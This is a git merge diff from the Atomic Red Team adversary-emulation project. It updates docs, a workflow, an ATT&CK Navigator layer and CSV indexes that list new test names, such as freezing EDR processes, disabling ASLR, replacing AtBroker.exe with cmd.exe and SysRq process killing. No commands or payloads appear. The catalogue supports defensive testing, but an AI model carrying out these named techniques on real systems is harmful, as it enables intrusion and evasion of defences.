Merge branch 'master' into issue_template_fix

Co-authored-by: Hare Sudhan <code@0x6c.dev>

.github/ISSUE_TEMPLATE/new_atomic.md

@@ -8,12 +8,12 @@ assignees: ''
 ---
 
 <!--
-For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
+For reference, check out this article that explains how to properly submit a new atomic test: https://www.atomicredteam.io/atomic-red-team/docs/designing-atomic-tests.
 -->
 
 ### Technique ID: TXXXX
 
 ### Additional Details
 <!--
-Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition. 
+Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
 -->

.github/workflows/stale.yml

@@ -7,7 +7,7 @@ jobs:
   stale:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/stale@v9
+      - uses: actions/stale@v10
         with:
           stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
           stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1738-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1748-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 
 Atomic Red Team™ is a library of tests mapped to the

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -6,6 +6,7 @@ credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-
 credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh

atomics/Indexes/Indexes-CSV/index.csv

@@ -180,6 +180,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encod
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,11,Expand CAB with expand.exe,9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11,command_prompt
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
 defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
@@ -538,6 +539,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -824,6 +827,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -946,6 +950,7 @@ privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistenc
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -1099,6 +1104,7 @@ execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Servic
 execution,T1569.002,System Services: Service Execution,8,Pipe Creation - PsExec Tool Execution From Suspicious Locations,004a5d68-627b-452d-af3d-43bd1fc75a3b,powershell
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -1285,6 +1291,7 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux
 persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
 persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -1303,6 +1310,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -1422,6 +1430,7 @@ persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automat
 persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
@@ -1521,6 +1530,7 @@ command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.e
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
 command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
 command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
+command-and-control,T1105,Ingress Tool Transfer,39,Curl Insecure Connection from a Pod,7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3,bash
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
@@ -2024,6 +2034,7 @@ discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
 discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
@@ -2150,6 +2161,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
 impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
@@ -2215,6 +2227,7 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
+initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -125,6 +125,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -367,6 +368,7 @@ discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
@@ -425,6 +427,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
 impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
@@ -442,6 +445,7 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
+initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -105,6 +105,7 @@ defense-evasion,T1202,Indirect Command Execution,4,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,5,Indirect Command Execution - RunMRU Dialog,de323a93-2f18-4bd5-ba60-d6fca6aeff76,powershell
